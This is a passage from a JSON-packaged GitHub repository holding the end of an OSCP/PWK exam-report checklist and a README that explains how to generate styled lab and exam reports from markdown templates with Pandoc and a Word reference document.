(e.g. loose ends, interesting intermediary findings, etc.), optionally remove it before merging with the master report -->\r\n\r\n### Reporting checklist\r\n<!-- Remove before merging with the master report -->\r\n- [ ] Are screenshots of the proof files together with `ipconfig/ifconfig/ip a` included?\r\n- [ ] Is all *modified* source code included?\r\n- [ ] Are all relevant exploits referenced?\r\n- [ ] Are all steps reproducible?"
  },
  {
    "path": "README.md",
    "content": "# OSCP / PWK Markdown Reporting Templates and Pandoc Reference Style\r\n\r\nI wrote [a blog post](https://casvancooten.com/posts/2020/05/generating-pretty-pwk-reports-with-pandoc-and-markdown-templates-inside/) on how to use these templates to easily generate pretty reports with little effort.\r\n\r\nThis repo contains the templates I used for OSCP / PWK lab and exam reporting, as well as the basic styles I used to convert the markdown report to a (relatively) slick-looking and organized report, while preserving code formatting and syntax highlighting. To achieve this I generate the PDF based on an intermediary Word file generated through Pandoc.\r\n\r\nThe repo also contains some [examples](https://github.com/chvancooten/OSCP-MarkdownReportingTemplates/tree/master/Examples) to show what a report may come to look like. Note that the final conversion to Word from PDF does require some manual styling work (which is actually what I personally preferred). Since I obviously cannot disclose any PWK lab or exam writeups, I've used some VulnHub writeups as filler instead. Don't open the example report if you don't want spoilers for `Brainpan`, `Kioptrix2014`, `Zico`, or `LazyAdmin`. 🙃\r\n\r\n## Requirements\r\n\r\n- A Markdown editor of your choosing\r\n- [Pandoc](https://pandoc.org/)\r\n- `1337 hacking skillz`\r\n\r\n## How to use\r\n\r\n### Preparing markdown report\r\n\r\nThe markdown templates are fairly straightforward. I strongly recommend using a Markdown editor that has decent backup / synchronization features as well as a feature to copy and paste screenshots (must-have IMO). I used [Joplin](https://joplinapp.org/) as a daily editor, and [VS Code](https://code.visualstudio.com/docs/languages/markdown) to compile and streamline the final report.\r\n\r\nWhile doing the labs or exam, I would recommend keeping separate write-ups per machine, based on the template you aim to use for reporting. Once you are happy with your separate machine write-ups and ready to compile them into a report, export your markdown files (if needed) and ensure that all the images are intact. Then, compile a master document with an appropriate introduction to, and summary of, your work. For this I have included the Lab and Exam Report templates, which are based on OffSec's own reporting templates.\r\n\r\n### Preparing `reference.docx` for custom styling (optional)\r\n\r\nThe `reference.docx` file determines the basic styling of your intermediate Word document. I have included an example file which covers all the styles, but you can generate and adapt your own if you want.\r\n\r\nYou can export a reference file as follows:\r\n\r\n```\r\npandoc --print-default-data-file reference.docx > custom-reference.docx\r\n```\r\n\r\nEdit the styles embedded in the document as desired to determine how Pandoc will generate your report. \r\n\r\n> Don't overlook the many important styles (such as \"source code\") that are hidden, you can see the full overview by clicking the \"box-with-arrow\" on the bottom right of the styling section in Word, and edit the styles from there.\r\n\r\n### Generating intermediate .docx report\r\n\r\nTo maintain full control of the output report, I worked with an intermediate report in Word format. You can generate this report as follows. [This article](https://www.garrickadenbuie.com/blog/pandoc-syntax-highlighting-examples/) has a nice and visual representation of the different syntax highlighting styles that Pandoc offer by default.\r\n\r\n```\r\npandoc \"Example Report _ No Styling.md\" -o output.docx --highlight-style=tango --reference-doc=./custom-reference.docx\r\n```\r\n\r\n![Generating the docx report](./_resources/GeneratingReport.png)\r\n\r\n### Finalizing the report \r\n\r\nThe pandoc reference document covers a lot of the styling, but not everything that I wanted it to. As such, I adapted the following manually to ensure that the output document is nice and sleek:\r\n\r\n- Title page formatting\r\n- Table of contents\r\n- Page numbering\r\n- Image Sizes\r\n  - Since Pandoc renders images at page width by default, some images come out really big depending on the aspect ratio of the original image. This could be solved by using something like `![my caption](./figures/myimage.png){ width=250px }` in your original MarkDown file, but I prefer going through to manually resize images to the right size.\r\n\r\nOf course, this is up to your preference! At this point you can tweak your styles or formatting as you desire.\r\n\r\n### Exporting PDF\r\n\r\nOffSec expects your report in PDF format. Generating that from Word shouldn't be much of a hurdle though. ;)\r\n"
  }
]